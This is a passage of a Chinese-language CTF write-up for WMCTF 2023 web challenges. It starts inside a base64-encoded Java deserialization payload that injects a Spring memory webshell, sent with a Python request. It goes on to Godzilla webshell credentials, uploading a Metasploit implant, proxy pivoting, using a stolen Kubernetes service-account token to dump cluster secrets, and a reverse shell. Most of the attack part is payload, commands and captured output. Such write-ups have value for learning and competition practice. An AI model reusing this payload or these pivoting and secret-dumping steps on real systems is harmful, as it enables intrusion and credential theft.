ErNzZPYitUalpqeEorbFM2TmFVd2taa3pmUHBtQi95MzhHMlp2ZDhaSExqRDVXbjRIdTkwM1hJOXdzS2MrZko5L01DUHAvQkRhU1p2R1BsV0lsdXJBVHd0QjlRUi9JU2hhOVZUeHNyS0RmSEJYQjUrZzhoYTlGUDhUQWI3NTFMaGVEWS9LMjMrSldPWlJad0l6aDR4MUJwWlpucTdzVDdhYnZkR04yY3NuNDNyVi9qd1cxYjFlYWcxL0Y3Z2l2R0xaQndkY3N6L3dZL244VWNHTm1iRTI2ME9kYmV0RCtCUGVGSGEvR2NlcEpQczc0WjkxMkZVaU9CZjhGZko5VGNtblJMZnFWc2RvZHBvdTd5THQ4c28vSU5zRWFVamdIOUtSSi9IditSa3JpZUdLcDMrNDhkTGVGbGU5SjZWcS8rcE1GekxLNlJaUjlRRGVGWDJ0VjE0alZydEFEQ0g4dXlBQ0Z3eXhrVk8zcVI0MTNPMUVsaHZsMzJCVngyNkltMUZZeFcxaXRVbjhpaXdMZUY4R2l5NlFGZHhPb1h3aVFrc0llRzNPNlpqajA4RU9KWDNqQ0xYeENRNzlSc05xeVBCQy9HNk1iU01ac3ZWYTlwVElXUkxvQUZUeENYU2dBSW0vWjdSVmFlSnFTemU4ZGcxTVozUVJlTmRpWDEwZWZVWVZUdUd5TEU2aVpncGl2eGlodUQzeVNSRFliRGR1YS83eEdXc2oxUTZYdEVaVFlVcmFtdWFOd3pXRFdHYUk1dUcrdUVUOCtSRnpYRGlLY0cwSndXcEZzcU1NV3lxUmFPbFplbVdzREJ0dXRwMFc1dmNLV0d2WHhPT3FTK21BQ2JMRHgrWEtLUDQ1a1NhSDRaWFJlV3RiK2JWaWNpTjBWaE16L2xjckpBK1lqNXIxd05xaHh0KytRM0dqMVcvL0dCVDcyWHFIZUNLazVoVUUvaHJDdC95bjZjUStTZlZ5aS9uOE9qVFNZT25rOVd1UEMxeVRpY1dvdUEwcGhkaTVtbk1la0J0Q2ZuUjVwQ0YrSmFFM3RKZUxKREhMc3ptTTA5dGxtS09za2tSWUM3bU9jd0xIZWJyU2UzaWUwRnBzQmRMenFDa3BSZWxwekE5ZzRwVG1NVm5CbGYwWWNWcHJCcVNQSW5lQStXVVYwRkVRa3JEZEZ1S28wR3VMc2NpWlJqbm02TnJMYkdUVkJOS2crN2dJNzE0L2NrUnhpN1BFVFVoSzJvQ3FsQ3RSSEgrTzZLZUpvZUg3MkRCbGo1c2J5cS83QjVvbnVQd2VNOWdSNHN5L0xxQ0xiMjRJWU53ZVRDRDlwTk40cVJTc1FURnFLUDlzNVVpTDU5WFV0UnEybHZGazJwK1I2NVJSbFR5TEkrNzY3R0IxQ1UwNlNwY3Jmd09aZzBMWXFNeVRLN3FjUTFwbXJoZUEvY0FnK2pSNE5Ld1NXajhxcENQQVJubW5EMHVHc1VBWnNEdGJFcXFPa3JyUUpTUzZLVExUeHVrcytlQ2ZUamFqMk11UEk3bnN1cyt2QzJEZDk2RHA0TDllSzlBbFNmSXNQWGpIbm55b1NwdmFaSFhuY0ZIcXJ4Rm5vS1A5ZU9UTGp5QkJYSjlCcTZXMGd3K2s4RVhlbkd5eUp2QnFYNWszRGlPSThHQ3ZpSnZQL3JkdkFnY1lTSThWSldYNVQ2TEV4azhVcVVkeCtRcTN4bWNiU255OWVLeFI0dTBvcndNbnRqSnQxZSt5L3J4VFlGVFdPV2VNaVdENzJid295SXRneDg3KzZXUytCa1A3ZXJETDNpV3BaYkV2K0tHKzM3UC9mVCtJSTd4NnJuUGVYYzY4ZHFtNnF1VzhhbkRZa2Fta3JGWnk3alVNeklkZkpxTXdVRkNld3hieU5XRXU3RVo5M0pxM1VmT0Uyakd3OWlPeDNBdG51RUg0d3NjR0M5aXQ0cDFHNnZ1R0hYRWtXRGwzczFmU2V4bmpSN2tieE1wNXNHOWxHU2ZMbVlNTEtTWmZKWEV1WXZ4bHpsMExwc1Q1OUNOQXlvbnpxRUhONnBVUHFja3VWVjJySVQzVlhSb09NU1FEMUNhcHFKL1dNUE5HbTYxdHpWZUtaZ0xkN3lDZk82OWpLYVhLZS9YTW4zNHJtTkdMR09oMkdYQWpGYzV1VlEwRlB5dUR5ODBsakd5MTduNU9KZkIzOC9ncFJaUFdRYi83c1YvSmNDdlpERFFRSmJHb0t3RkYzdERlYllXNXRBMzRBYnU2dlM4RmRNUTVybEJpZ2lydkUzaE5JKzBQdFpFUFg2ai9GcksvSitxU3JnQ3ozRWxsSWVGY0EyUWpWN3Q0cCtkMVRTV054ODdyVVVUQVpXZ0hSSU5oVUxyRS9tTlpZVmlvamdySm1kRVlSbmYwekppVmxNNVU3UlF6UFk4akJNdDdvSk56VHdyNTQ5Ylc5eWxYTTg2aTExMHBicXBVTXhWRW1SdWVvbzhpbWwrTGxPUlp4U1hsN1Z5VXZXOWRiU3RqcG5VeFZnTklyR00zUktxQm1NMHQ1TjdjZEoxOFR4Qnl2M1l4SnpZeXF6b1loYjBNQmNPTXVJU25ZMUVjRFk0bWxTczJiU0VFRkxIVml4U2V4NXlWamg3NjdGS3VKMStja2g0bUVVU3hZUENtMFd4UkhhUk90VVpCbEVjd0FyWlFkUnYxU3I0R0prYS9GWnlVTjd0b0h3MEYrWEx4MFo1c1FQWXJ0RW9iN0wvaUZvTnNTNGVoWFZwTHVzSXJJZDRoeENYMVZySE9yMkZTVDRjOFlNOFBVelRiK0xlemFRN1NzcGJTSGtiRVR5Q25iaWR2KzdrNmc3K3Z5c0g4Ukt4d0VGOG5ZUHVUZ1RWbm9lY2xjN2VOVmliUmZ3b0ViZno5ZzRpWHAyTGVMMlR0NXNjeEtzbDR1cjMySWo3UkRBN2g2OVdSUUVzN0JQbDV4dWtQSDVBVFdIcGU0RWFZNFcwYXlwN3lIeFcxd0lJVVNHdEU2SC9Bek5tdWs4UEZ3QUEMAGMAZAwAdQB2DACGAHYMAJAAkQcBKgwBKwEsDAEtAS4BADxvcmcuc3ByaW5nZnJhbWV3b3JrLndlYi5jb250ZXh0LnJlcXVlc3QuUmVxdWVzdENvbnRleHRIb2xkZXIMAS8BMAEAFGdldFJlcXVlc3RBdHRyaWJ1dGVzDAC5AK4BAApnZXRSZXF1ZXN0AQAKZ2V0U2Vzc2lvbgEAEWdldFNlcnZsZXRDb250ZXh0AQBCb3JnLnNwcmluZ2ZyYW1ld29yay53ZWIuY29udGV4dC5zdXBwb3J0LldlYkFwcGxpY2F0aW9uQ29udGV4dFV0aWxzAQAYZ2V0V2ViQXBwbGljYXRpb25Db250ZXh0AQAPamF2YS9sYW5nL0NsYXNzAQAcamF2YXguc2VydmxldC5TZXJ2bGV0Q29udGV4dAEAEGphdmEvbGFuZy9PYmplY3QMALkAvAEAE2phdmEvbGFuZy9FeGNlcHRpb24BADFvcmcuc3ByaW5nZnJhbWV3b3JrLmNvbnRleHQuc3VwcG9ydC5MaXZlQmVhbnNWaWV3DAExAHYMAK0ArgEAF2phdmEvdXRpbC9MaW5rZWRIYXNoU2V0DABxATIHATMMATQAdgEANW9yZy5zcHJpbmdmcmFtZXdvcmsud2ViLmNvbnRleHQuV2ViQXBwbGljYXRpb25Db250ZXh0DAE1ATYMATcBOAwAXwBZDABgAFkMAJcAmAwAngCfAQAVamF2YS9sYW5nL0NsYXNzTG9hZGVyBwE5DAE6AIwMATsBPAcBKQwBPQE+DAE/AUAMAUEBQgEAE2phdmEvbGFuZy9UaHJvd2FibGUBAAdnZXRCZWFuAQAQamF2YS9sYW5nL1N0cmluZwEAHHJlcXVlc3RNYXBwaW5nSGFuZGxlck1hcHBpbmcBABNqYXZhL3V0aWwvQXJyYXlMaXN0DAFDAUQBABZzdW4ubWlzYy5CQVNFNjREZWNvZGVyDAFFATABAAxkZWNvZGVCdWZmZXIMAUYBPAEAEGphdmEudXRpbC5CYXNlNjQBAApnZXREZWNvZGVyAQAGZGVjb2RlAQAdamF2YS9pby9CeXRlQXJyYXlPdXRwdXRTdHJlYW0BABxqYXZhL2lvL0J5dGVBcnJheUlucHV0U3RyZWFtDABjAUcBAB1qYXZhL3V0aWwvemlwL0daSVBJbnB1dFN0cmVhbQwAYwFIDAFJAUoMAUsBTAwBTQFODACzALQHAU8MAVABUQwBUgFTAQAeamF2YS9sYW5nL05vU3VjaEZpZWxkRXhjZXB0aW9uDAFUATYMAGMBVQwBVgFXDAFYAFkMAVkBRAwBWgFbAQAfamF2YS9sYW5nL05vU3VjaE1ldGhvZEV4Y2VwdGlvbgEAIGphdmEvbGFuZy9JbGxlZ2FsQWNjZXNzRXhjZXB0aW9uAQAaamF2YS9sYW5nL1J1bnRpbWVFeGNlcHRpb24MAVwAWQEAFmNvbS9leGFtcGxlL2V4cC9BdnhlcmIBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQATamF2YS9pby9JT0V4Y2VwdGlvbgEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAIGphdmEvbGFuZy9DbGFzc05vdEZvdW5kRXhjZXB0aW9uAQAramF2YS9sYW5nL3JlZmxlY3QvSW52b2NhdGlvblRhcmdldEV4Y2VwdGlvbgEAGGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZAEAEGphdmEvbGFuZy9UaHJlYWQBAA1jdXJyZW50VGhyZWFkAQAUKClMamF2YS9sYW5nL1RocmVhZDsBABVnZXRDb250ZXh0Q2xhc3NMb2FkZXIBABkoKUxqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7AQAJbG9hZENsYXNzAQAlKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL0NsYXNzOwEAC25ld0luc3RhbmNlAQAWKClMamF2YS91dGlsL0l0ZXJhdG9yOwEAEmphdmEvdXRpbC9JdGVyYXRvcgEABG5leHQBAAhnZXRDbGFzcwEAEygpTGphdmEvbGFuZy9DbGFzczsBABBpc0Fzc2lnbmFibGVGcm9tAQAUKExqYXZhL2xhbmcvQ2xhc3M7KVoBABFqYXZhL2xhbmcvSW50ZWdlcgEABFRZUEUBABFnZXREZWNsYXJlZE1ldGhvZAEAQChMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBAA1zZXRBY2Nlc3NpYmxlAQAEKFopVgEAB3ZhbHVlT2YBABYoSSlMamF2YS9sYW5nL0ludGVnZXI7AQAGaW52b2tlAQA5KExqYXZhL2xhbmcvT2JqZWN0O1tMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQADYWRkAQAVKExqYXZhL2xhbmcvT2JqZWN0OylaAQAHZm9yTmFtZQEACWdldE1ldGhvZAEABShbQilWAQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQAEcmVhZAEABShbQilJAQAFd3JpdGUBAAcoW0JJSSlWAQALdG9CeXRlQXJyYXkBAAQoKVtCAQAXamF2YS9sYW5nL3JlZmxlY3QvRmllbGQBAANnZXQBACYoTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwEAEGdldERlY2xhcmVkRmllbGQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZDsBAA1nZXRTdXBlcmNsYXNzAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWAQASZ2V0RGVjbGFyZWRNZXRob2RzAQAdKClbTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBAAdnZXROYW1lAQAGZXF1YWxzAQARZ2V0UGFyYW1ldGVyVHlwZXMBABQoKVtMamF2YS9sYW5nL0NsYXNzOwEACmdldE1lc3NhZ2UAIQBWAFcAAAAAAA8AAQBYAFkAAQBaAAAALQABAAEAAAADEgGwAAAAAgBbAAAABgABAAAAGABcAAAADAABAAAAAwBdAF4AAAABAF8AWQABAFoAAAAtAAEAAQAAAAMSArAAAAACAFsAAAAGAAEAAAAcAFwAAAAMAAEAAAADAF0AXgAAAAEAYABZAAIAWgAAAC0AAQABAAAAAxIDsAAAAAIAWwAAAAYAAQAAACAAXAAAAAwAAQAAAAMAXQBeAAAAYQAAAAQAAQBiAAEAYwBkAAIAWgAAAGMAAwADAAAAFSq3AAQqtgAFTCq3AAZNKisstgAHsQAAAAIAWwAAABYABQAAACMABAAkAAkAJQAOACYAFAAnAFwAAAAgAAMAAAAVAF0AXgAAAAkADABlAGYAAQAOAAcAZwBmAAIAYQAAAAQAAQAXAAEAaABpAAMAWgAAAD8AAAADAAAAAbEAAAACAFsAAAAGAAEAAAAsAFwAAAAgAAMAAAABAF0AXgAAAAAAAQBqAGsAAQAAAAEAbABtAAIAYQAAAAQAAQBuAG8AAAAJAgBqAAAAbAAAAAEAaABwAAMAWgAAAEkAAAAEAAAAAbEAAAACAFsAAAAGAAEAAAAxAFwAAAAqAAQAAAABAF0AXgAAAAAAAQBqAGsAAQAAAAEAcQByAAIAAAABAHMAdAADAGEAAAAEAAEAbgBvAAAADQMAagAAAHEAAABzAAAAAQB1AHYAAgBaAAABkQAHAAcAAACRuAAItgAJTAFNKxIKtgALEgy4AA06BBkEEg64AA1OLRIPuAANOgUZBRIQuAANOgYrEhG2AAsSEgS9ABNZAysSFLYAC1MEvQAVWQMZBlO4ABZNpwAFOgQsxwA4KxIYtgALtgAZEhq4ABvAABw6BBkEtgAduQAeAQBOKxIftgALLbYAILYAIZkABS1NpwAFOgQssAACAAkAUQBUABcAWgCKAI0AFwADAFsAAABGABEAAAA0AAcANQAJADkAFgA6AB4AOwAmADwALwA9AFEAPwBUAD4AVgBBAFoAQwBtAEQAeABFAIgARgCKAEkAjQBIAI8ATABcAAAAXAAJABYAOwB3AGYABAAmACsAeABmAAUALwAiAHkAZgAGAB4ANgB6AGYAAwBtAB0AewB8AAQAeAAVAHoAZgADAAAAkQBdAF4AAAAHAIoAfQB+AAEACQCIAGUAZgACAH8AAAAwAAX/AFQAAwcAgAcAgQcAggABBwCDAfwAMwcAgv8AAgADBwCABwCBBwCCAAEHAIMBAGEAAAAKAAQAhACFAFAAUgACAIYAdgACAFoAAAFUAAYABwAAAHq4AAi2AAlMAU0rKrYAIrYAC7YAGU2nAGNOKrYAI7gAJLgAJToEEiYSJwa9ABNZAxIoU1kEsgApU1kFsgApU7YAKjoFGQUEtgArGQUrBr0AFVkDGQRTWQQDuAAsU1kFGQS+uAAsU7YALcAAEzoGGQa2ABlNpwAFOgQssAACAAkAFQAYABcAGQBzAHYALgADAFsAAAA2AA0AAABQAAcAUQAJAFQAFQBeABgAVQAZAFcAJQBYAEMAWQBJAFoAbQBbAHMAXQB2AFwAeABgAFwAAABIAAcAJQBOAIcAiAAEAEMAMACJAIoABQBtAAYAiwCMAAYAGQBfAI0AjgADAAAAegBdAF4AAAAHAHMAfQB+AAEACQBxAGcAZgACAH8AAAAuAAP/ABgAAwcAgAcAgQcAggABBwCD/wBdAAQHAIAHAIEHAIIHAIMAAQcAj/oAAQBhAAAABAABABcAAQCQAJEAAgBaAAAAvQAHAAUAAAAwKxIvBL0AE1kDEjBTBL0AFVkDEjFTuAAWTi0SMrgAG8AAMzoEGQQstgA0V6cABE6xAAEAAAArAC4AFwAEAFsAAAAaAAYAAABlABkAZgAkAGcAKwBpAC4AaAAvAGsAXAAAADQABQAZABIAkgBmAAMAJAAHAJMAlAAEAAAAMABdAF4AAAAAADAAZQBmAAEAAAAwAGcAZgACAJUAAAAMAAEAJAAHAJMAlgAEAH8AAAAHAAJuBwCDAABvAAAACQIAZQAAAGcAAAAIAJcAmAADAFoAAADqAAYABAAAAHASNbgANkwrEjcEvQATWQMSMFO2ADgrtgAZBL0AFVkDKlO2AC3AACjAACjAACiwTRI5uAA2TCsSOgO9ABO2ADgBA70AFbYALU4ttgAgEjsEvQATWQMSMFO2ADgtBL0AFVkDKlO2AC3AACjAACjAACiwAAEAAAAtAC4AFwADAFsAAAAaAAYAAABwAAYAcQAuAHIALwBzADUAdABIAHUAXAAAADQABQAGACgAmQCMAAEASAAoAJoAZgADAC8AQQCbAI4AAgAAAHAAnACdAAAANQA7AJkAjAABAH8AAAAGAAFuBwCDAGEAAAAKAAQAhABQAIUAUgBvAAAABQEAnAAAAAkAngCfAAMAWgAAANQABAAGAAAAPrsAPFm3AD1MuwA+WSq3AD9NuwBAWSy3AEFOEQEAvAg6BC0ZBLYAQlk2BZsADysZBAMVBbYAQ6f/6yu2AESwAAAAAwBbAAAAHgAHAAAAegAIAHsAEQB8ABoAfQAhAIAALQCBADkAhABcAAAAPgAGAAAAPgCgAIgAAAAIADYAoQCiAAEAEQAtAKMApAACABoAJAClAKYAAwAhAB0ApwCIAAQAKgAUAKgAqQAFAH8AAAAcAAL/ACEABQcAKAcAqgcAqwcArAcAKAAA/AAXAQBhAAAABAABAGIAbwAAAAUBAKAAAAAIAK0ArgADAFoAAABXAAIAAwAAABEqK7gARU0sBLYARiwqtgBHsAAAAAIAWwAAAA4AAwAAAIgABgCJAAsAigBcAAAAIAADAAAAEQCvAGYAAAAAABEAsACdAAEABgALALEAsgACAGEAAAAEAAEAFwBvAAAACQIArwAAALAAAAAIALMAtAADAFoAAADHAAMABAAAACgqtgAgTSzGABksK7YASE4tBLYARi2wTiy2AEpNp//puwBJWSu3AEu/AAEACQAVABYASQAEAFsAAAAmAAkAAACOAAUAkAAJAJIADwCTABQAlAAWAJUAFwCWABwAlwAfAJoAXAAAADQABQAPAAcAsQCyAAMAFwAFAJsAtQADAAAAKACvAGYAAAAAACgAsACdAAEABQAjAIsAjAACAJUAAAAMAAEABQAjAIsAtgACAH8AAAANAAP8AAUHALdQBwC4CABhAAAABAABAEkAbwAAAAkCAK8AAACwAAAAKAC5AK4AAwBaAAAAQgAEAAIAAAAOKisDvQATA70AFbgAFrAAAAACAFsAAAAGAAEAAACeAFwAAAAWAAIAAAAOALoAZgAAAAAADgC7AJ0AAQBhAAAACAADAFAAUgCFAG8AAAAJAgC6AAAAuwAAACkAuQC8AAMAWgAAAhcAAwAJAAAAyirBABOZAAoqwAATpwAHKrYAIDoEAToFGQQ6BhkFxwBkGQbGAF8sxwBDGQa2AEw6BwM2CBUIGQe+ogAuGQcVCDK2AE0rtgBOmQAZGQcVCDK2AE++mgANGQcVCDI6BacACYQIAaf/0KcADBkGKyy2ACo6Baf/qToHGQa2AEo6Bqf/nRkFxwAMuwBQWSu3AFG/GQUEtgArKsEAE5kAGhkFAS22AC2wOge7AFNZGQe2AFS3AFW/GQUqLbYALbA6B7sAU1kZB7YAVLcAVb8AAwAlAHIAdQBQAJwAowCkAFIAswC6ALsAUgADAFsAAABuABsAAACiABQAowAXAKQAGwCmACUAqAApAKkAMACrADsArABWAK0AXQCuAGAAqwBmALEAaQCyAHIAtgB1ALQAdwC1AH4AtgCBALkAhgC6AI8AvACVAL0AnAC/AKQAwACmAMEAswDFALsAxgC9AMcAXAAAAHoADAAzADMAvQCpAAgAMAA2AL4AvwAHAHcABwDAAMEABwCmAA0AwgDDAAcAvQANAMQAwwAHAAAAygCvAGYAAAAAAMoAuwCdAAEAAADKAMUAxgACAAAAygDHAMgAAwAUALYAiwCMAAQAFwCzAMkAigAFABsArwDKAIwABgB/AAAALwAODkMHALf+AAgHALcHAMsHALf9ABcHAMwBLPkABQIIQgcAzQsNVAcAzg5HBwDOAGEAAAAIAAMAUACFAFIAbwAAABEEAK8AAAC7AAAAxQAAAMcAAAABAM8AAAACANBwdAAEYWFhYXB3AQB4dXIAEltMamF2YS5sYW5nLkNsYXNzO6sW167LzVqZAgAAeHAAAAABdnIAHWphdmF4LnhtbC50cmFuc2Zvcm0uVGVtcGxhdGVzAAAAAAAAAAAAAAB4cHcEAAAAA3ZyADdjb20uc3VuLm9yZy5hcGFjaGUueGFsYW4uaW50ZXJuYWwueHNsdGMudHJheC5UckFYRmlsdGVyAAAAAAAAAAAAAAB4cHQAA2Jhcng="}
requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)

加密器: JAVA_AES_BASE64
地址: /shellAacw125
密码: Hcreljak
密钥: Vazwoxyqvohfnbgcwq
请求头: Agent:aaa

后面要内网渗透

没法直接执行命令

用哥斯拉马上传 msf 马并给可执行权限

![](WMCTF 2023 web writeup/HVg7b8mTuo29CPxPYhFc6nItn3d.png)

执行上线 msf

![](WMCTF 2023 web writeup/Y0gUbcYhdorUcRxdZAFce8E3npt.png)

![](WMCTF 2023 web writeup/GSndbz0Dbo4RcexR8K6cyzNwnec.png)

然后同样的方法挂个 nps 代理，用 Proxifier 连上访问内网

从环境变量里能看出有 k8s 服务，还有个 CHECK_SERVICE

![](WMCTF 2023 web writeup/W4i5bp1FKo2MizxWBOEcSS1anOz.png)

题目源码有个内网地址

![](WMCTF 2023 web writeup/ECskbDQXboCbfOxv8vMcyQw0nrh.png)

viper 做端口转发

![](WMCTF 2023 web writeup/DgH9bKE2MoOQLex09qmcA8IGnsh.png)

从给的 jar 包里的 lib.so 里拿到 token

export KUBE="eyJhbGciOiJSUzI1NiIsImtpZCI6IlZvTVB3eDlfNm0wSzljbnhXRUNZU3JWa1VQRjY3Z05xaTRKU2xwUzBZNXcifQ.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJkZWZhdWx0Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZWNyZXQubmFtZSI6ImN0Zi1zZXJ2aWNlYWNjb3VudC1zZWNyZXQiLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlcnZpY2UtYWNjb3VudC5uYW1lIjoiY3RmLXNlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZXJ2aWNlLWFjY291bnQudWlkIjoiYjEwNWQ5ODctZmQ1Zi00MjZiLTgxODgtOWI3MWNjZTkwYmRhIiwic3ViIjoic3lzdGVtOnNlcnZpY2VhY2NvdW50OmRlZmF1bHQ6Y3RmLXNlcnZpY2VhY2NvdW50In0.DAaw3fHoGdY8Kl4BHnGeuQaAHJQpLdbB-jsatlLVfJM60N6Ftx0TyXlGDCsgm2e0u25xnWudQqZeneu1H1EaC0QQDzliPjG5dVhbXYIciM3dOyb8cap5wy5bPAgsAE1wPs_ZxAT6r7XQjWfYkqY6waI6R4_Hdrb98Vzwo4O6EYqNQAX8lVlGtAoIbkZ7U72z-zDR6rf_IHetdRs2JYpzG9kScbZLkWGHelY18dCXZHW_FfKqw1yh9zLUf8mh3PwXIeruUOp2oznVazT-qVnxaMOhLKF-4zqEXPbQVgoZh8mT6DNXj5GCBDex4_Uptj-dYJtMzSNC8qyenAeb3tg3Sg"
kubectl --token=$KUBE --server=https://xxx.xxx.xx.xxx:6443 --insecure-skip-tls-verify=true auth can-i --list -n default

![](WMCTF 2023 web writeup/XHg9brxAfoOSMYxQzjhcLT9SnDe.jpg)

kubectl --token=$KUBE --server=https://xxx.xxx.xx.xxx:6443 --insecure-skip-tls-verify=true get secrets -o yaml -n default

得到

apiVersion: v1
items:
- apiVersion: v1
  data:
    password: NWU5ZDgxODktNWMxNi00NTg3LTkyNjAtNGU2YjBjODZmMWVi
    username: a2V5
  kind: Secret
  metadata:
    annotations:
      kubectl.kubernetes.io/last-applied-configuration: |
        {"apiVersion":"v1","data":{"password":"NWU5ZDgxODktNWMxNi00NTg3LTkyNjAtNGU2YjBjODZmMWVi","username":"a2V5"},"kind":"Secret","metadata":{"annotations":{},"name":"key-secret","namespace":"default"},"type":"Opaque"}
    creationTimestamp: "2023-08-18T19:01:04Z"
    managedFields:
    - apiVersion: v1
      fieldsType: FieldsV1
      fieldsV1:
        f:data:
          .: {}
          f:password: {}
          f:username: {}
        f:metadata:
          f:annotations:
            .: {}
            f:kubectl.kubernetes.io/last-applied-configuration: {}
        f:type: {}
      manager: kubectl-client-side-apply
      operation: Update
      time: "2023-08-18T19:01:04Z"
    name: key-secret
    namespace: default
    resourceVersion: "31990"
    uid: 41eca5bb-3afb-49cd-86ef-9b0e482929d2
  type: Opaque
- apiVersion: v1
  data:
    ca.crt: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSUJkekNDQVIyZ0F3SUJBZ0lCQURBS0JnZ3Foa2pPUFFRREFqQWpNU0V3SHdZRFZRUUREQmhyTTNNdGMyVnkKZG1WeUxXTmhRREUyT1RJek5EWTFNamd3SGhjTk1qTXdPREU0TURneE5USTRXaGNOTXpNd09ERTFNRGd4TlRJNApXakFqTVNFd0h3WURWUVFEREJock0zTXRjMlZ5ZG1WeUxXTmhRREUyT1RJek5EWTFNamd3V1RBVEJnY3Foa2pPClBRSUJCZ2dxaGtqT1BRTUJCd05DQUFTbWZBdCtJTDdTSEdTT0VCQjB6djBhZThhOHBZaVVRempQWG5HUWt6SXoKQnJvdmNTK0s4c1o2NjRwaExBR2IzMmdrV1RndzdVSlArL3IyUUJzekV5Q09vMEl3UURBT0JnTlZIUThCQWY4RQpCQU1DQXFRd0R3WURWUjBUQVFIL0JBVXdBd0VCL3pBZEJnTlZIUTRFRmdRVXMvZDRrbytkemtCV0h6cVdSY3FCCnhMMkVaaHd3Q2dZSUtvWkl6ajBFQXdJRFNBQXdSUUlnTS91NHFIcU93Z2drenhuejV1cG80dnlJSzQvQTBDcWcKMGVoTGxKRUQwNG9DSVFDdXNLcGVncm5IKy9IeWxYSXVMV3liZGNXbjZZMTlXOXR2MXdSUktSNDBzdz09Ci0tLS0tRU5EIENFUlRJRklDQVRFLS0tLS0K
    namespace: ZGVmYXVsdA==
    token: ZXlKaGJHY2lPaUpTVXpJMU5pSXNJbXRwWkNJNklsWnZUVkIzZURsZk5tMHdTemxqYm5oWFJVTlpVM0pXYTFWUVJqWTNaMDV4YVRSS1UyeHdVekJaTlhjaWZRLmV5SnBjM01pT2lKcmRXSmxjbTVsZEdWekwzTmxjblpwWTJWaFkyTnZkVzUwSWl3aWEzVmlaWEp1WlhSbGN5NXBieTl6WlhKMmFXTmxZV05qYjNWdWRDOXVZVzFsYzNCaFkyVWlPaUprWldaaGRXeDBJaXdpYTNWaVpYSnVaWFJsY3k1cGJ5OXpaWEoyYVdObFlXTmpiM1Z1ZEM5elpXTnlaWFF1Ym1GdFpTSTZJbU4wWmkxelpYSjJhV05sWVdOamIzVnVkQzF6WldOeVpYUWlMQ0pyZFdKbGNtNWxkR1Z6TG1sdkwzTmxjblpwWTJWaFkyTnZkVzUwTDNObGNuWnBZMlV0WVdOamIzVnVkQzV1WVcxbElqb2lZM1JtTFhObGNuWnBZMlZoWTJOdmRXNTBJaXdpYTNWaVpYSnVaWFJsY3k1cGJ5OXpaWEoyYVdObFlXTmpiM1Z1ZEM5elpYSjJhV05sTFdGalkyOTFiblF1ZFdsa0lqb2lZakV3TldRNU9EY3RabVExWmkwME1qWmlMVGd4T0RndE9XSTNNV05qWlRrd1ltUmhJaXdpYzNWaUlqb2ljM2x6ZEdWdE9uTmxjblpwWTJWaFkyTnZkVzUwT21SbFptRjFiSFE2WTNSbUxYTmxjblpwWTJWaFkyTnZkVzUwSW4wLkRBYXczZkhvR2RZOEtsNEJIbkdldVFhQUhKUXBMZGJCLWpzYXRsTFZmSk02ME42RnR4MFR5WGxHRENzZ20yZTB1MjV4bld1ZFFxWmVuZXUxSDFFYUMwUVFEemxpUGpHNWRWaGJYWUljaU0zZE95YjhjYXA1d3k1YlBBZ3NBRTF3UHNfWnhBVDZyN1hRaldmWWtxWTZ3YUk2UjRfSGRyYjk4Vnp3bzRPNkVZcU5RQVg4bFZsR3RBb0lia1o3VTcyei16RFI2cmZfSUhldGRSczJKWXB6RzlrU2NiWkxrV0dIZWxZMThkQ1haSFdfRmZLcXcxeWg5ekxVZjhtaDNQd1hJZXJ1VU9wMm96blZhelQtcVZueGFNT2hMS0YtNHpxRVhQYlFWZ29aaDhtVDZETlhqNUdDQkRleDRfVXB0ai1kWUp0TXpTTkM4cXllbkFlYjN0ZzNTZw==
  kind: Secret
  metadata:
    annotations:
      kubernetes.io/service-account.name: ctf-serviceaccount
      kubernetes.io/service-account.uid: b105d987-fd5f-426b-8188-9b71cce90bda
    creationTimestamp: "2023-08-18T13:22:29Z"
    labels:
      kubernetes.io/legacy-token-last-used: "2023-08-20"
    managedFields:
    - apiVersion: v1
      fieldsType: FieldsV1
      fieldsV1:
        f:metadata:
          f:annotations:
            .: {}
            f:kubernetes.io/service-account.name: {}
        f:type: {}
      manager: kubectl-create
      operation: Update
      time: "2023-08-18T13:22:29Z"
    - apiVersion: v1
      fieldsType: FieldsV1
      fieldsV1:
        f:data:
          .: {}
          f:ca.crt: {}
          f:namespace: {}
          f:token: {}
        f:metadata:
          f:annotations:
            f:kubernetes.io/service-account.uid: {}
          f:labels:
            .: {}
            f:kubernetes.io/legacy-token-last-used: {}
      manager: k3s
      operation: Update
      time: "2023-08-20T06:36:29Z"
    name: ctf-serviceaccount-secret
    namespace: default
    resourceVersion: "140777"
    uid: bf517b49-e11d-42da-879c-df84513ce55d
  type: kubernetes.io/service-account-token
kind: List
metadata:
  resourceVersion: ""
  selfLink: ""

上面 password 进行 base64 解码得到 key 5e9d8189-5c16-4587-9260-4e6b0c86f1eb

访问内网 check_service 执行命令

![](WMCTF 2023 web writeup/NY9WbdcKRohonMxYuVGcAtTRnFf.png)

反弹个 shell 然后执行 /readflag

![](WMCTF 2023 web writeup/ApFMb2PjwolBRdxZCf5cQ6DEn7e.png)